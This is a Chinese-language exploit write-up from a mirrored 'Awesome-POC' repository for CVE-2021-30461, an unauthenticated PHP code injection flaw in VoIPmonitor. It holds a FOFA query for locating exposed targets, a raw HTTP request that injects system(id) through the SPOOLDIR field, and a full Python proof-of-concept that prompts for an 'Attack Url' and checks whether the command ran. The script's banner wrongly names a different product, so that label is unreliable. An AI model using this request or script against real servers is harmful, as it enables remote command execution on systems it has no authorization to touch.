admin/Awesome-POC
1
0
Fork 0
mirror of https://github.com/Threekiii/Awesome-POC.git synced 2025-11-07 11:58:05 +00:00
Code Issues Packages Projects Releases Wiki Activity
Awesome-POC/服务器应用漏洞/VoIPmonitor 远程命令执行漏洞 CVE-2021-30461.md
Threekiii cba0c4db58 更新漏洞
2022-12-05 11:09:28 +08:00

135 lines
4.1 KiB
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# VoIPmonitor 远程命令执行漏洞 CVE-2021-30461
## 漏洞描述
VoIPmonitor是“具有在Linux上运行的SIP RTP和RTCP VoIP协议的具有商业前端的开源网络数据包嗅探器”。
使用通过Web界面到达的用户提供的数据允许未经身份验证的远程用户触发VoIPmonitor中的远程PHP代码执行漏洞。
## 漏洞影响
```
VoIPmonitor < 24.60
```
## FOFA
```
"VoIPmonitor"
```
## 漏洞复现
登录页面如下
![image-20220209130009649](./images/202202091300913.png)
index.php文件中的关键代码
```php
$setConfigurationTypeValue_rslt = array();
if(file_exists('config/configuration.php')) {
$existsConfiguration = true;
if(isset($_POST['recheck'])) {
if(!empty($_POST['SPOOLDIR'])) {
setConfigurationTypeValue__index('SPOOLDIR', $_POST['SPOOLDIR']);
}
}
```
传入参数 recheck 和 SPOOLDIR 并将**SPOOLDIR** 写入 **config/configuration.php**
![image-20220209130028591](./images/202202091300813.png)
发送如下请求包
```plain
POST /index.php HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:86.0) Gecko/20100101 Firefox/86.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Accept-Language: en-US,en;q=0.5
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Content-Length: 49
SPOOLDIR=test%22.system%28id%29.%22&recheck=annen
```
![image-20220209130049113](./images/202202091300382.png)
成功执行命令
## 漏洞POC
```python
#!/usr/bin/python3
#-*- coding:utf-8 -*-
# author : PeiQi
# from : http://wiki.peiqi.tech
import base64
import requests
import random
import re
import json
import sys
from requests.packages.urllib3.exceptions import InsecureRequestWarning
def title():
print('+------------------------------------------')
print('+ \033[34mPOC_Des: http://wiki.peiqi.tech \033[0m')
print('+ \033[34mGithub : https://github.com/PeiQi0 \033[0m')
print('+ \033[34m公众号 : PeiQi文库 \033[0m')
print('+ \033[34mVersion: 锐捷EG网关 cli.php RCE \033[0m')
print('+ \033[36m使用格式: python3 poc.py \033[0m')
print('+ \033[36mUrl >>> http://xxx.xxx.xxx.xxx \033[0m')
print('+------------------------------------------')
def POC_1(target_url):
vuln_url = target_url + "/index.php"
data = {"SPOOLDIR": "/tmp", "recheck": "annen"}
headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36",
"Content-Type": "application/x-www-form-urlencoded"
}
try:
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
response = requests.post(url=vuln_url, data=data, headers=headers, verify=False)
except Exception as e:
print("\033[31m[x] 请求失败:{} \033[0m".format(e))
sys.exit(0)
POC_2(target_url)
def POC_2(target_url):
vuln_url = target_url + "/index.php"
headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36",
"Content-Type": "application/x-www-form-urlencoded"
}
data = {"SPOOLDIR": "test\".system(id).\"", "recheck": "annen"}
print("\033[36m[o] 正在执行命令 id .....\033[0m")
try:
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
response = requests.post(url=vuln_url, data=data, headers=headers, verify=False)
if "uid=" in response.text:
print("\033[36m[o] 成功执行 id, 目标存在漏洞.....\033[0m")
else:
print("\033[31m[x] 请求失败 \033[0m")
exit()
except Exception as e:
print("\033[31m[x] 请求失败:{} \033[0m".format(e))
sys.exit(0)
if __name__ == '__main__':
title()
target_url = str(input("\033[35mPlease input Attack Url\nUrl >>> \033[0m"))
POC_1(target_url)
```
![image-20220209130112258](./images/202202091301601.png)
Reference in New Issue View Git Blame Copy Permalink